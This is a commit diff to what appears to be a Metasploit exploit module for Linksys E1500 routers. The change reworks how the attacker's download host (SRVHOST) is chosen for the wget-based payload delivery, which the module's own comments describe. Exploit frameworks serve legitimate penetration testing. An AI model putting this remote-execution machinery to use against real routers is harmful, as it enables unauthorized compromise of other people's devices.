Juans SRVHOST check included

m-1-k-3 · m-1-k-3 · commit 579c499f4391 · 2013-04-02T07:50:51.000+02:00
diff --git a/modules/exploits/linux/http/linksys_e1500_up_exec.rb b/modules/exploits/linux/http/linksys_e1500_up_exec.rb
@@ -163,10 +163,13 @@ def exploit
 
 			#we use SRVHOST as download IP for the coming wget command. 
 			#SRVHOST needs a real IP address of our download host
-			if datastore['SRVHOST'] =~ /0\.0\.0\.0/
-				fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Configure SRVHOST to your local IP address.")
+			if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+				srv_host = Rex::Socket.source_address(rhost)
+			else
+				srv_host = datastore['SRVHOST']
 			end
-			service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
+
+			service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
 			print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
 			start_service({'Uri' => {
 				'Proc' => Proc.new { |cli, req|
